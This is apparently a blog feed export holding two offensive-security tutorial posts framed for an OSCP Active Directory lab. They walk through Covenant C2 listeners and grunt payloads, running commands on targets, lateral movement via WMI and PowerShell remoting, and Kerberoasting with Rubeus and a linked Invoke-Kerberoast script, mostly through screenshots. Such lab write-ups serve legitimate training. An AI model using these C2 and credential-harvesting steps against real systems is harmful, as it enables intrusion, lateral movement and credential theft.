src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N0X0HcTtZ68yvp6pUrQe7EEzRNHSTaApg-tiHDGUGzfBz6Zh3RicIq2zsqQotByYVsxZ1kYDRHX_kwDm978A29ODbBNfUJAp7EJdbXpIpUSJZ48yR-T8mDDklwQMQYC3SPJ-G160vxxscK9K2r6alXfBBSi4NPoWFkZ0hIDI5sHdsFMzcMs4Ph5g/s16000/im7.png" /></a></div><p><span style="background-color: black;"><span style="color: #fcff01;"><b><span style="background-color: black;"><span style="color: #fcff01;"></span></span></b></span></span></p><p><span style="background-color: black;"><span style="color: #fcff01;">Use new grunt session to launch SMB grunt on Machine B</span></span></p><p>Once we got the grunt session as impersonated user, we can use this session to launch Grunt on another machine directly. </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDbZjKCkQR6p4yNxjb3UlDEbW6dw-OtoJqpO08wm8OoAZqvUcPLYpT16eNlJFbGNcRw4WT0BZevj0AK7G76snRpwcS2KescI8U2kVMQEvqTCMeUrTKVFZ9AffbEdKr4orqH65WANxXN2sIXwE3_7dMt2HlujTTN1JZ5wENQnv8gNIEnT0Rf1Yg6UQv/s1402/im8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="796" data-original-width="1402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDbZjKCkQR6p4yNxjb3UlDEbW6dw-OtoJqpO08wm8OoAZqvUcPLYpT16eNlJFbGNcRw4WT0BZevj0AK7G76snRpwcS2KescI8U2kVMQEvqTCMeUrTKVFZ9AffbEdKr4orqH65WANxXN2sIXwE3_7dMt2HlujTTN1JZ5wENQnv8gNIEnT0Rf1Yg6UQv/s16000/im8.png" /></a></div><br />After switching to newly created grunt session, use <span style="color: white;">WMIGrunt </span>task, specify target machine hostname, powershell as launcher name and wait for the response:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi93dXmw9SCrDCm6vRyJ1qT8URiH1nGP54ebmyp2q0R7wl1_y2pndszVBL30rU1VdbMcedjP8Xg1tQcEjE3O7YOAq127tAPK9nydEsoEzNxH4j8SatVfueJGWbdQIqMTpj7FgZT_mVuRthxRlI10lTFzrmvmwz6R9olY8T_Xlj0K6GqglVsC_6njGe3/s975/im9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="975" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi93dXmw9SCrDCm6vRyJ1qT8URiH1nGP54ebmyp2q0R7wl1_y2pndszVBL30rU1VdbMcedjP8Xg1tQcEjE3O7YOAq127tAPK9nydEsoEzNxH4j8SatVfueJGWbdQIqMTpj7FgZT_mVuRthxRlI10lTFzrmvmwz6R9olY8T_Xlj0K6GqglVsC_6njGe3/s16000/im9.png" /></a></div><br /> Connect to the SMB grunt using the connect command:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCooASAzqT7QNf-tkbeDoCcXXcoAZ2hF13avKZJczdYR4FYAsYsEU0yeFPXJF_PTBm_ZaTnbAmYRVOHA4yKbRaLA1E-6NDQ4-QmcoBOlD345X58YXqWu0cy6srasirUpEF_2UVimYTldX9n14KBf3PcGoTmeieU6MvkzhQlaX0MEUzU7mjc8xbeJgq/s978/im11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="978" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCooASAzqT7QNf-tkbeDoCcXXcoAZ2hF13avKZJczdYR4FYAsYsEU0yeFPXJF_PTBm_ZaTnbAmYRVOHA4yKbRaLA1E-6NDQ4-QmcoBOlD345X58YXqWu0cy6srasirUpEF_2UVimYTldX9n14KBf3PcGoTmeieU6MvkzhQlaX0MEUzU7mjc8xbeJgq/s16000/im11.png" /></a></div><p><span style="background-color: black;"><span style="color: #fcff01;"><b> Launch SMB grunt on machine A with the privilege of impersonate user - WMIGrunt</b></span></span> <br /></p><p></p><p>In a similar way, we can use <span style="color: white;">PowerShellRemotingGrunt</span>.</p><p>Don't forget to create a PowerShell launcher with a different <span style="color: white;">SMBPipename</span>:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6-hC8LV189RlvgmgfKI7uBsLUyCR3dqDg8yTbycsvURoM7pOaGoWNL9maOTyfq1pTCLaleMIkH8HBibBLNWII3opL2vbNrjH9uTMl-gM8ppSy5ts0sWvKP-Y47PGCFT2DwciKBkXM50GDTCqOcekcDCVSjoef0Elj91bL7TfWIVeY_9p6H1ldIu4/s983/im12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="771" data-original-width="983" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6-hC8LV189RlvgmgfKI7uBsLUyCR3dqDg8yTbycsvURoM7pOaGoWNL9maOTyfq1pTCLaleMIkH8HBibBLNWII3opL2vbNrjH9uTMl-gM8ppSy5ts0sWvKP-Y47PGCFT2DwciKBkXM50GDTCqOcekcDCVSjoef0Elj91bL7TfWIVeY_9p6H1ldIu4/s16000/im12.png" /></a></div><br />Execute command to launch Grunt on target machine using <span style="color: white;">PowerShellRemotingGrunt</span> and connect to it by using connect command:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrcc-e-19LPdehttx6d72HgQ99mrQz_C_NbtqAiE7Nq-ukUiOv5-Bhxk4tPeZm2iydxvv8SOIjxqe_ufI0p-pEpLj3sagdyVXU4qCZ1oO_V8FMiT6KUe6Dowv9Cxryn3_znrT5sGzvuD7wcPP3UzrjfLevt-RF2AcdIFFNuGmRYmy-PgwE4kzp5YnO/s993/im13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="643" data-original-width="993" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrcc-e-19LPdehttx6d72HgQ99mrQz_C_NbtqAiE7Nq-ukUiOv5-Bhxk4tPeZm2iydxvv8SOIjxqe_ufI0p-pEpLj3sagdyVXU4qCZ1oO_V8FMiT6KUe6Dowv9Cxryn3_znrT5sGzvuD7wcPP3UzrjfLevt-RF2AcdIFFNuGmRYmy-PgwE4kzp5YnO/s16000/im13.png" /></a></div><p></p><div><p>Thanks for reading.</p><p><br />Special thanks to: - Burcu YARAR, <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent 
Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, vivek chauhan, Manoj and <a href="https://twitter.com/5h4d0w_hun73r">Karan</a><br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div><span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
<div><div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil,
google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India,
Magnum sniper, </code></div><div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, </code></div><div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#Golden boy INDIA, Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji,Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
</div><br /><br /><p><br /><br /><br /><br /></p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-87354777147106409112022-07-02T22:17:00.023+05:302023-11-22T11:26:01.673+05:30Covenant C2 for OSCP AD lab - Part 1<p> Hello all,<span></span></p><a name='more'></a>In this blog post, I am going to demonstrate a few of the features of the Covenant C2 framework.<p></p><p>Please follow the instructions to install Covenant C2 from the official GitHub repository: <br /></p><p><span style="color: #2b00fe;"><a href="https://github.com/cobbr/Covenant/wiki/Installation-And-Startup">https://github.com/cobbr/Covenant/wiki/Installation-And-Startup</a></span></p><h3 style="text-align: left;"><span style="color: white;">Listener: -<br /></span></h3><div style="text-align: left;">A Listener is what allows a Covenant agent to talk to the Covenant server. </div><div style="text-align: left;">To create a listener, the following options need to be configured:</div><div style="text-align: left;"> </div><div style="text-align: left;">Source - Covenant wiki page</div><div style="text-align: left;"> </div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVgHw1I7RoVMMV8hHbwXABrKPbyGhdR16T6ft_x2dheNMrauqNbfHMutksy53ntJ9xDx7kUJ2ylyZ4bWRYJLFOi4uocaLOIAu-LJVHVLi_DhDTGklbLSEn5dsAlZrDqA2IaIjXaA5Y0gPrzWGT86zPzBFI3X7gka6Jo8pueJM5s2G7RGwzXKzJhW1S/s1272/list2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="703" data-original-width="1272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVgHw1I7RoVMMV8hHbwXABrKPbyGhdR16T6ft_x2dheNMrauqNbfHMutksy53ntJ9xDx7kUJ2ylyZ4bWRYJLFOi4uocaLOIAu-LJVHVLi_DhDTGklbLSEn5dsAlZrDqA2IaIjXaA5Y0gPrzWGT86zPzBFI3X7gka6Jo8pueJM5s2G7RGwzXKzJhW1S/s16000/list2.png" /></a></div><br />In my case, I configured Covenant like this and the name of 
the listener is <span style="color: white;">http</span>:</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPYnVTMWFuPoLyF-rkhPy8VkNYVMPaoRID0gZc1VyuvvDc-_krOkkF9ep0TrLPGx6BjIBdJrEGHTd6e1RhyJdSTbCZdQlkFGhGpacpAED5NPR1KETZeQ4HNoZuh-ZUnu0tK6KaO1oS3_wVGzOJ4FnACM26GG4iB2-EeY-S3_k8jXr8ivizgN4dTHT/s1337/list.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="936" data-original-width="1337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPYnVTMWFuPoLyF-rkhPy8VkNYVMPaoRID0gZc1VyuvvDc-_krOkkF9ep0TrLPGx6BjIBdJrEGHTd6e1RhyJdSTbCZdQlkFGhGpacpAED5NPR1KETZeQ4HNoZuh-ZUnu0tK6KaO1oS3_wVGzOJ4FnACM26GG4iB2-EeY-S3_k8jXr8ivizgN4dTHT/s16000/list.png" /></a></div><div style="text-align: left;"><span style="color: white;"><span style="color: black;"> </span></span></div><h3 style="text-align: left;"><span style="color: white;">Grunt: -<br /></span></h3><div style="text-align: left;">A Grunt is an agent which takes commands from the Covenant framework and executes them on the target machine. 
</div><div style="text-align: left;">It can be a binary file or PowerShell/VB/JS based code.</div><div style="text-align: left;"> </div><div style="text-align: left;">To generate a Grunt, we need to go to <b><span style="color: white;">Launcher</span></b> section:</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgabo2ghCiGvl1r1UIGChoexkZbTLCgOlzfL2R6J5H51taGRQyDfpe_4tGNEsw-sjN-6Pnx_MtphQsMTliIpzFWoQk_dz08ToWGLmJuaa1piTJoX7qKon1HoK1EMMMVQzxNOrc5LmAS2lP87bXJidz5nIS--WflJOWLnImXqnCaxZ3ahr8VJ_k1WITy/s1110/launch.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="601" data-original-width="1110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgabo2ghCiGvl1r1UIGChoexkZbTLCgOlzfL2R6J5H51taGRQyDfpe_4tGNEsw-sjN-6Pnx_MtphQsMTliIpzFWoQk_dz08ToWGLmJuaa1piTJoX7qKon1HoK1EMMMVQzxNOrc5LmAS2lP87bXJidz5nIS--WflJOWLnImXqnCaxZ3ahr8VJ_k1WITy/s16000/launch.png" /></a></div><br /><div style="text-align: left;">In my case, I will be using Binary based or PowerShell code based grunts.</div><div style="text-align: left;"> </div><div style="text-align: left;">Let's take example of Binary based Grunt. 
</div><div style="text-align: left;"> </div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb47NpVxunfpnbtI_hOimv6btDh8cheLtaUdh3uIoiGOz45yqBU7AZ3kLV5lDEpMtQsFhKmPCx4BjEjdLoQRDr3_mtxipIHdfJplf7lbWSN36NKVytsuCK4mYhkNoFbpmcGN8Eg47w37vVdPUIOCLUXrCG5j3HN7AdNrBkWSJyqHGaMxPKB859mcaY/s1089/grunt1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1089" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb47NpVxunfpnbtI_hOimv6btDh8cheLtaUdh3uIoiGOz45yqBU7AZ3kLV5lDEpMtQsFhKmPCx4BjEjdLoQRDr3_mtxipIHdfJplf7lbWSN36NKVytsuCK4mYhkNoFbpmcGN8Eg47w37vVdPUIOCLUXrCG5j3HN7AdNrBkWSJyqHGaMxPKB859mcaY/s16000/grunt1.png" /></a></div></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"><br />Upload this binary to target machine and execute it. </div><div style="text-align: left;">For example, in case of a vulnerable web application, exploit vulnerability which allows us to gain web shell access, upload it and execute it using web shell.</div><div style="text-align: left;"> </div><div style="text-align: left;">Here is the PowerShell code based Grunt, for which we need to select newly created HTTP based Listener + specify other parameters and click Generate button to generate the PowerShell code which we need to execute on target machine/server using any trick (again, lets say vulnerable web app allowed us to gain web shell access and we can execute this PowerShell based payload on server using that web shell)</div><div style="text-align: left;"> </div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbM_AFf2gxmQGyQiRAKZ_gcF2NdiIZPKxrRWpCsaB-5AldHf4b_QgLPiQoydU4_D9etMJt5WiO2ml_G1hJ-l1PfWWVbVf0wx4V9J9gNe58zwCaTIwtpCRodR6bD_EJ6zKjuPPBMxzZZgi2rLLS916zd25xUS1wt4gGDdfpKqucofJydtlboGJmrCa/s1643/grunt2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="781" data-original-width="1643" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbM_AFf2gxmQGyQiRAKZ_gcF2NdiIZPKxrRWpCsaB-5AldHf4b_QgLPiQoydU4_D9etMJt5WiO2ml_G1hJ-l1PfWWVbVf0wx4V9J9gNe58zwCaTIwtpCRodR6bD_EJ6zKjuPPBMxzZZgi2rLLS916zd25xUS1wt4gGDdfpKqucofJydtlboGJmrCa/s16000/grunt2.png" /></a></div> <span style="color: #f3f3f3;"><u><span style="font-size: large;"> </span></u></span></div><div style="text-align: left;"><span style="color: #f3f3f3;"><u><span style="font-size: large;">Basics of Grunt </span></u></span><br /></div><p>First of all, create an HTTP launcher which will be used by Covenant agent to communicate to Covenant framework.</p><p>Once Grunt payload will be executed on the target, session will be created which can be accessed just by clicking it:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwbYFb_3DC3pfqZ2MtsZcIg_2kFRd5EnUQVdmwQkPJQRICOaRr5lGiNu4KgAnMxP6ISDcX4ytdoqbsy03rkUSRgGWbfEHd3OYom6JysxuHonCvsgnKs3LIFMPOtFkRfQrFqklx09VSwQAxLYjZDyqR7xad-TvbCkj9h31j19Tnx7QPIb74SiSts7e/s1433/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1433" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwbYFb_3DC3pfqZ2MtsZcIg_2kFRd5EnUQVdmwQkPJQRICOaRr5lGiNu4KgAnMxP6ISDcX4ytdoqbsy03rkUSRgGWbfEHd3OYom6JysxuHonCvsgnKs3LIFMPOtFkRfQrFqklx09VSwQAxLYjZDyqR7xad-TvbCkj9h31j19Tnx7QPIb74SiSts7e/s16000/4.png" /></a></div><p></p><p>Grunt's info tab shows the basic info regarding the Grunt agent and the target machine:</p><div class="separator" 
style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqmMvPiOBhxEyOfeoNbZVboSKX_MNu1ppYaV7YBBa3DiN9w-vhssQJPPxKeEoqjB7BHe2I6cJq_0kX2AtohuoY4JZT_mlmdTHwojJM3ZMDN4TslJc6ngIdtkTj3Kw_ZTqJyzmbTvcBrq4PbQB8kf6M3U-eWqHfwlDhOij9_DdmxzAK5WKmQdbXIMw/s1223/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="769" data-original-width="1223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqmMvPiOBhxEyOfeoNbZVboSKX_MNu1ppYaV7YBBa3DiN9w-vhssQJPPxKeEoqjB7BHe2I6cJq_0kX2AtohuoY4JZT_mlmdTHwojJM3ZMDN4TslJc6ngIdtkTj3Kw_ZTqJyzmbTvcBrq4PbQB8kf6M3U-eWqHfwlDhOij9_DdmxzAK5WKmQdbXIMw/s16000/5.png" /></a></div><p>To execute commands on the target machine, either use the <span style="color: white;"><b>Interact</b></span> tab (CLI interface) or go for the <b><span style="color: white;">Task</span></b> tab. </p><p><span style="color: white;"><span style="font-size: large;">Interact Tab: - </span></span></p><p>This is the CLI interface of Covenant, which is used to show the commands executed by the user and their output.<span style="color: white;"></span></p><p style="text-align: center;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUc0WvN0aR7_rN65TQJI87jVD4bwn1pLjPi8FofIezzsuomOu-EdhpEw2Kr6D2xJWIdbspNkVRnWSaUjhTeQf1sRhLYT-5xmlH5JHPgyP3PdB3MaMccwDXqYr7QQCDjrXzgTxvVTxCF7RNga-4KzJQUWT55Vy12NuchRep4PSFhmJBCc7dBw6xBpwW/s1213/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="806" data-original-width="1213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUc0WvN0aR7_rN65TQJI87jVD4bwn1pLjPi8FofIezzsuomOu-EdhpEw2Kr6D2xJWIdbspNkVRnWSaUjhTeQf1sRhLYT-5xmlH5JHPgyP3PdB3MaMccwDXqYr7QQCDjrXzgTxvVTxCF7RNga-4KzJQUWT55Vy12NuchRep4PSFhmJBCc7dBw6xBpwW/s16000/7.png" /></a></div><b><br /></b><div><p></p><p><span style="font-size: large;"><span style="color: white;">Task 
Tab: - </span></span></p><p>The Task tab is a GUI for selecting a task to be executed by Covenant; this interface lets the user specify the parameters of the selected task:<span style="font-size: large;"><span style="color: white;"></span></span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ0-kTSo34XnZOwquDDZ-5msEPCUBwsq3c88UMREWSU7vQ1ikyE0mjt4CRtiGuqRanjF2rNRKzgDQ2G2FLkPIt_J7THHbEh89T-D1nqZ_cLXnPg22wJ1XHKukfvDgZwE6w1aSUTqUVnmroY9dQ4lHw_yLexNJ-qSnXg_9mQ_RDUdcf94TgQhn85kKH/s864/9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="797" data-original-width="864" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ0-kTSo34XnZOwquDDZ-5msEPCUBwsq3c88UMREWSU7vQ1ikyE0mjt4CRtiGuqRanjF2rNRKzgDQ2G2FLkPIt_J7THHbEh89T-D1nqZ_cLXnPg22wJ1XHKukfvDgZwE6w1aSUTqUVnmroY9dQ4lHw_yLexNJ-qSnXg_9mQ_RDUdcf94TgQhn85kKH/s16000/9.png" /></a></div><b> </b></div><div><br /><p></p><p><span style="font-size: large;"><span style="color: white;">OS command execution:</span></span></p><p>Let's go for the 'Task' tab because it is self-explanatory and beginner-friendly. 
<br /></p><p>For OS command execution, use <span style="color: white;"><b>shell</b></span> or <b><span style="color: white;">shellcmd</span></b> task module:</p><p><b></b></p><div class="separator" style="clear: both; text-align: center;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05OaQMjxNrQ-sP_o1SoxvHo-CpjbTLxiUfdcnnzp_Pg2ZobKf0tKDkbEtJry8nARs77kQDD2votCeNiVMoZhXkIeqj6d5qz1KSCuvGiY3dbLB8B8LVQBoGcG8ZSzQ1M9u0D4sse4BoVco6KR1zqklyaAPADFzXF3xhgQ0-KMQTy_N9_8G-T8Ykd0K/s653/10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="430" data-original-width="653" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05OaQMjxNrQ-sP_o1SoxvHo-CpjbTLxiUfdcnnzp_Pg2ZobKf0tKDkbEtJry8nARs77kQDD2votCeNiVMoZhXkIeqj6d5qz1KSCuvGiY3dbLB8B8LVQBoGcG8ZSzQ1M9u0D4sse4BoVco6KR1zqklyaAPADFzXF3xhgQ0-KMQTy_N9_8G-T8Ykd0K/s16000/10.png" /></a></b></div><p></p><p>After clicking <span style="color: white;"><b>Task</b></span> button, We will be dropped to the <span style="color: white;"><b>Interact </b></span>tab automatically where output of the task will be displayed:<br /><b> </b> <br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHlZCy0TuknCHKEhfENjiXBvcj9Uzr6AtOHr5VoVir6f1rZHwSJZy4vQsD6KFv0s0m7SSM5PN9sVhxs0DRYjM5Hh5bgUj9TWVIJRsHwPi9ZI6mRvMUdgdUkuzm9d8_Z4peIxpBkKooSoq-iL_EdFhW_rXoE5w08h92t4rgFILDi1Rq4wVaofHmoYVd/s814/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="814" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHlZCy0TuknCHKEhfENjiXBvcj9Uzr6AtOHr5VoVir6f1rZHwSJZy4vQsD6KFv0s0m7SSM5PN9sVhxs0DRYjM5Hh5bgUj9TWVIJRsHwPi9ZI6mRvMUdgdUkuzm9d8_Z4peIxpBkKooSoq-iL_EdFhW_rXoE5w08h92t4rgFILDi1Rq4wVaofHmoYVd/s16000/11.png" /></a></div><p></p><p>We can execute other OS commands using this task module.</p><h1 style="text-align: left;"><span style="font-size: 
x-large;"><span style="color: #ffa400;"><span style="font-weight: normal;"><u>AD environment related attacks:</u></span></span></span></h1><p>Let's go for the AD environment based attacks, such as:</p><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">1. Kerberoasting</span></span></span></span></h3><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">2. Impersonating logged-in user</span></span></span></span></h3><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">3. Dumping NTLM/Plaintext password of logged-in/local user account</span></span></span></span></h3><p><br /></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. Kerberoasting</span></span></span></h3><p>It can be performed using an in-built <b><span style="color: white;">Task</span></b>, or we can go for PowerShell based scripts. Covenant has two in-built Tasks for this, <b><span style="color: white;">Kerberoast</span></b> and <span style="color: white;"><b>Rubeus</b></span>.</p><p><b><span style="color: white;">Rubeus </span></b>is my first choice because in the <b><span style="color: white;">Kerberoast </span></b>Task we need to specify the name of the SPN for which we want to perform Kerberoasting, whereas with <b><span style="color: white;">Rubeus</span></b> we need not do so.</p><p>So let's start with <b><span style="color: white;">Rubeus</span></b>. 
Just select <b><span style="color: white;">Rubeus </span></b>and make sure <span style="color: white;">kerberoast</span> is mentioned in the command input field:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNtmTU6j1IDNwMca_r8aRtiIbSXoc1-bJFYoYNYVfQkP00vveWJgFXhMqhpYjtdQ9XQ6DxlzibR1CavuT-WCs7dbY9ivIhjefdRk_5Qk8BmcglSWlSL0L4gzWSmHnuBQkjf9icpFzHeewNhtB8z0x2iIXFryRqyjD7tlM1XdisaEiy5kxwgLkVY2uZ/s621/30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="621" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNtmTU6j1IDNwMca_r8aRtiIbSXoc1-bJFYoYNYVfQkP00vveWJgFXhMqhpYjtdQ9XQ6DxlzibR1CavuT-WCs7dbY9ivIhjefdRk_5Qk8BmcglSWlSL0L4gzWSmHnuBQkjf9icpFzHeewNhtB8z0x2iIXFryRqyjD7tlM1XdisaEiy5kxwgLkVY2uZ/s16000/30.png" /></a></div><br /> Click <span style="color: white;">Task </span>button and wait for the output:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSS5jlkPIoikTJJBRxye4fJjSN--AgZl5GQpjK3jqQEG3kYJWlipa_euzY8k_utseQk7-fhWr5Zk05UaJOYGb3zsYzv7NQRWKUytoQniE6a0vONX_OwmNyvomvTON9DFn3Lyz5Kodjyghu8bo3Wo_gilk6fZ29sAAxy9G1DwwC7mCUQVaM1ga1DfuD/s850/31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="850" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSS5jlkPIoikTJJBRxye4fJjSN--AgZl5GQpjK3jqQEG3kYJWlipa_euzY8k_utseQk7-fhWr5Zk05UaJOYGb3zsYzv7NQRWKUytoQniE6a0vONX_OwmNyvomvTON9DFn3Lyz5Kodjyghu8bo3Wo_gilk6fZ29sAAxy9G1DwwC7mCUQVaM1ga1DfuD/s16000/31.png" /></a></div><p>There we go!!!!</p><p>Let's try with PowerShell script. </p><p>I personally like to go for PowerShell script based kerberoasting. 
The PowerShell Empire framework has a very good script for this, developed by harmj0y bhai ji.<br />Link: </p><p><a href="https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1">https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1</a></p><p>Download the script, and in the <span style="color: white;">Task </span>tab select the Task type <b><span style="color: white;">PowerShellImport</span></b> and browse to the Kerberoasting PowerShell script. By clicking the <span style="color: white;">Task</span> button, the script is imported into Covenant and we can use it via the <b><span style="color: white;">PowerShell </span></b>Task:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 